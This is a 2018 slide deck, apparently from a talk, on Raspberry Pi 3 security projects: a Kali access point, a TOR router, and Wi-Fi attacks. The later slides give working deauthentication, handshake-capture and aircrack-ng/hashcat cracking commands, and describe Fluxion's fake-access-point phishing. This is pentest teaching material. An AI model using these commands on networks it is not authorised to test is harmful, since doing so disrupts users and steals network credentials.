Raspberry pi 3

Thursday, June 21, 2018 1
Raspberry Pi 3

Whoami
Sanket Kakde
Sr.Consultant @ LTI
www.linkedin.com/in/sanket-kakde-1717a677
https://twitter.com/kakdesanket?s=09

Thursday, June 21, 2018
What will we be doing today ???
Hackstation Onion-Pi /TOR Switch Firewall
Intrusion Detection System
Wi-Fi Attack Domain Controller

What is the
Raspberry Pi?
✓ A low cost, credit-card sized computer
✓ Small computer that can communicate with
outside world (Internet)
✓ Cost effective computer
✓ Use standard keyboard & mouse , plugs into
monitor or TV
4

Raspberry Pi Hardware
✓ 64-bit quad core ARM Cortex A53 clocked at 1.2 GHz processor
✓ 1 GB RAM LPDDR2-900
✓ Videocore IV GPU
✓ On-board 802.11n WiFi
✓ Bluetooth 4.0
✓ Ethernet 10/100
✓ Video Output – HDMI
✓ Storage micro-SD
✓ 40 pin GPIO
✓ 4 USB Ports
✓ CSI Camera Port
5

Raspberry Pi Kit

What do I support ???

Basic Hack Station Setup
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-
security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32Diskimager
✓ Good to Go
✓ Verify Installation by connecting RSPI in your network
Namp –sn 192.168.0.1/24
ssh root@192.168.0.125
✓ Update & Upgrade to latest version
apt-get update
apt-get upgrade

Hack Station Configuration
✓ Resize FS to utilize SD Card
Install tightvncserver
Apt-get install tightvncserver
Install gparted : Rezsize the file system
Steps to configure Access Point on RASPI
✓ Install hostapd &isc-dhcp-server
Hotapd :HostAPD is a user space daemon for access point and authentication servers.
apt-get install hostapd
isc-dhcp-server : DHCP Server for access point
apt-get install isc-dhcp-server
✓ Configure DHCP Server
✓ Modify configuration file vim /etc/dhcp/dhcpd.conf
✓ #option domain-name
✓ #option domain-name-servers
✓ authoritative;
✓ subnet 192.168.42.0 netmask 255.255.255.0 {
range 192.168.42.10 192.168.42.50;
option broadcast-address 192.168.42.255;
option routers 192.168.42.1;
default-lease-time 600;
max-lease-time 7200;

✓ Configure DHCP Server
✓ Edit default DHCP Config file to
✓ INTERFACES="wlan0“
✓ Turn off wireless interface
✓ ifdown wlan0
✓ Assign Static IP to Wireless Interface
✓ Vim /etc/network/interfaces
auto lo
iface lo inet loopback
iface eth0 inet dhcp
allow-hotplug wlan0
iface wlan0 inet static
address 192.168.42.1
netmask 255.255.255.0
✓ Assign IP Address to wireless interface
✓ ifconfig wlan0 192.168.42.1

✓ Configure Hostapd
✓ Edit Configuration file /etc/hostapd/hostapd.conf
interface=wlan0
#driver=rtl871xdrv
ssid=TORNet
country_code=US
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=Raspberry
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

✓Configure Hostpad
✓ Edit Default config files /etc/default/hostapd
DAEMON_CONF="/etc/hostapd/hostapd.conf"
✓ Edit /etc/sysctl.conf
net.ipv4.ip_forward=1
✓ Save and Flush iptables rules (Not mandatory)
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED
-j ACCEPT
iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
sh -c "iptables-save > /etc/iptables/rules.v4"
BUG : Kali Nexmon has bug in wifi driver you must bring up monitor interface
before starting hostapd
iw phy phy0 interface add mon0 type monitor && ifconfig mon0 up
✓ Start Services and enable them at startup
service hostapd start
service isc-dhcp-server start
update-rc.d hostapd enable
update-rc.d isc-dhcp-server enable

✓Configure SSH Interface
✓ Vim /etc/ssh/sshd_config
✓ Modify ListenAddress to wlan0 Interface address in this case 192.168.42.1

Hack Station Use Cases
✓ Red Teaming
✓ Pocket Computer
✓ Network Penetration Testing
✓ Social Engineering Attack
✓ …..Contd

Demo

Raspberry Pi 3
TOR Switch

TOR-PI Setup
Steps to install KALI Linux NEXMON
✓ Download KALI (https://www.offensive-security.com/kali-linux-arm-images/)
✓ Install Win32DiskImager
✓ Connect SD Card to computer
✓ Write image to SD Card using Win32Diskimager
✓ Good to Go
✓ Verify Installation by connecting RSPI in your network
Namp –sn 192.168.0.1/24
ssh root@192.168.0.125
✓ Update & Upgrade to latest version
apt-get update
apt-get upgrade
✓ Setup hostapd and isc-dhcp-server as demonstrated in previous slides.

TOR-PI Configuration
✓Install TOR
✓ apt-get update
✓ apt-get install tor
✓Edit TOR Configuration File
✓Vim /etc/tor/torrc
Log notice file /var/log/tor/notices.log
VirtualAddrNetwork 10.192.0.0/10
AutomapHostsSuffixes .onion,.exit
AutomapHostsOnResolve 1
TransPort 9040
TransListenAddress 192.168.42.1
DNSPort 53
DNSListenAddress 192.168.42.1

✓ Setup Iptables to route traffic
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 22 -j REDIRECT --to-ports 22
iptables -t nat -A PREROUTING -i wlan0 -p udp --dport 53 -j REDIRECT --to-ports 53
iptables -t nat -A PREROUTING -i wlan0 -p tcp --syn -j REDIRECT --to-ports 9040
iptables -t nat -L
sh -c "iptables-save > /etc/iptables.ipv4.nat“
✓ Create log files
touch /var/log/tor/notices.log
chown debian-tor /var/log/tor/notices.log
chmod 644 /var/log/tor/notices.log
✓ Start TOR Services
service tor start
service tor status
update-rc.d tor enable
TOR-PI Configuration

TOR-PI Use Cases
Anonymous Browsing
Hide online traces
Deep Web / Dark Web Market Access
TOR Relays

Demo

Wi-Fi Hacking
Kali Linux can be used for many things, but it
probably is best known for its ability to penetration
test, or “hack,” WPA and WPA2 networks.
All we need is raspberry pi and wireless network
interface capable of packet injection which supports
usage in promiscuous (monitoring) mode.
Raspberry Pi 3
Raspberry + Alpha Card
22

Wi-Fi Security
Target Protocols
WEP : Wired Equivalent Privacy
WPA /WPA2 : Wi-Fi Procted Access

Wi-Fi Attack Tools
Aircrack-ng
airmon-ng :
Converts our wireless card into a promiscuous mode wireless
card
airodump-ng :
Capture packets of our specification
airplay-ng :
Aireplay-ng is another powerful tool in our aircrack-ng
arsenal, and it can be used to generate or accelerate traffic on
the AP.
Aircrack-ng
Used to crack captured hashesh.

Wi-Fi Attack Tools
Commands
✓ List network interface and there mode
✓ iwconfig
✓ #Enable monitor mode on wlan0
✓ airmon-ng start wlan0
✓ Sniffing wifi packets , LIST ALL NEARBY STATIONS
✓ airodump-ng WLAN0MON
✓ #Scan particular station for clients and capture handshake
✓ airodump-ng wlan0mon --bssid C8:3A:35:37:BA:18 --channel 11 --
write test
✓ #Deauth all the clients from wifi
✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 wlan0mon
✓ Deauth specific client the clients from wifi
✓ aireplay-ng --deauth 100 -a C8:3A:35:37:BA:18 -c
48:88:CA:E9:83:0D wlan0mon
✓ Password cracking

Password Cracking using GPU Hashcat & Aircrack-ng
✓ Password cracking using aircrack-ng
✓ aircrack-ng -w Wifidictionary --bssid 50:C7:BF:79:4A:3A File.cap
✓ Password Cracking using Hashcat
✓ Convert *.cap file into hccapx
✓ Online
✓ Converter :https://hashcat.net/cap2hccapx/
✓ Offline
✓ Tool :https://github.com/hashcat/hashcat-utils
✓ Cracking
✓ Dictionary attack
✓ hashcat.exe -m 2500 capture.hccapx rockyou.txt
✓ Brute-Force attack
✓ hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d
✓ Rule-based attack
✓ hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt

Demo

Wi-Fi Social Engineering Attack Fluxion
Fluxion is a security auditing and
social-engineering research tool.
The script attempts to retrieve the
WPA/WPA2 key from a target
access point by means of a social
engineering (phishing) attack.
Compatible with the latest release
of Kali (rolling).

How it works ?
✓Scan the networks.
✓Capture a handshake
✓Launch a Fake AP instance
✓ Fake Use WEB Interface
✓Fake DNS Server
✓Deauth users
✓Captive portals

Wi-Fi Social Engineering Attack Fluxion

Demo

Raspberry pi 3

More Related Content

What's hot

Similar to Raspberry pi 3

Recently uploaded

Raspberry pi 3